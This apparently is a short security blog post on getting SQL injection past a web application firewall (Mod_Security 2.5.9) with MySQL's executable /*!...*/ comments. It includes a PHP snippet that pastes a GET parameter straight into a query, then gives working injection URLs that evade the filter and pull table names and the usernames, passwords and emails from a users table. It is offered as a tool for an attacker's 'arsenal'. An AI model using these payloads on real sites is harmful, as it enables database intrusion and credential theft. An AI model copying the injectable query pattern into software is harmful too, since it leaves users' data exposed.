Another fine method to exploit SQL Injection and bypass WAF

A method that I discovered today in MySQL documentation struck me with its simplicity and the fact that I haven’t noticed it before. Let me describe this method of bypassing WAF.

MySQL servers allow one to use comments of the following type:

/*!sql-code*/ and /*!12345sql-code*/

As can be noticed, SQL code will be executed from the comment in both cases! The latter construction means that "sql-code" should be executed only if the DBMS version is later than the given value.

As I have been repeatedly asserted [1,2], some WAFs skip comments during signature search. Among such WAFs, there is the latest stable assembly of Mod_Security (v. 2.5.9).

Here is a simple example:

...
$query = "SELECT name FROM table where id = ".$_GET[id];

$result = mysql_query($query);
...

If a web application is protected with Mod_Security, then the following request will be forbidden:

/?id=1+union+select+1

It is remarkable that even these requests (that are incorrect in the considered example) will be also forbidden by the WAF (HPP/HPF techniques):

/?id=1+union/*&id=*/select+table_name+from+information_schema.columns

/?id=1+union/*&blabla1=*/select+table_name&blabla2=from+information_schema.columns


But if we use the described method with comments, Mod_Security will allow our requests and we will be able to exploit an SQL Injection:

/?id=1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/

/?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/

/?id=1/*!limit+0+union+select+concat_ws(0x3a,username,password,email)+from+users*/

Well, one more method to our arsenal :-)